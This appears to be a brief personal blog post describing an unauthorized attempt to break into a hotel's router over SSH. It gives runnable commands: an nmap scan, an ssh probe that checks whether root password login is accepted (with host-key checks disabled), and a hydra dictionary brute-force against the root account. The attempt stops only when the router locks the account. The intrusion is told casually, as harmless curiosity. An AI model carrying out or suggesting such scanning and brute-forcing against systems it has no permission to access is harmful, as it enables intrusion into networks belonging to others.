I was living in a hotel in the quarantine time, which has a very bad network. While I was doing some network configuration checking, I accidentally found the ssh port of the router is open.
Scan open ports
I was scanning the router for an open HTTP port where I found its ssh port opening.
nmap $TARGET_IP
Check ssh authentication
Further check if it accepts root remote connect and password authentications.
ssh -v -n \
-o Batchmode=yes \
-o StrictHostKeyChecking=no \
-o UserKnownHostsFile=/dev/null \
root@$TARGET_IP 2>&1 | grep password
Turns out it does!
debug1: Authentications that can continue: password
Permission denied (password).
Try brute force the password
Use a dictionary
hydra -l root -P top-20-common-SSH-passwords.txt $TARGET_IP -t 4 ssh
User locked
After 10 tries, the root was locked. Looks like it is a Cisco router with Login Password Retry Lockout. Had to admit it is secure to me :relieved:.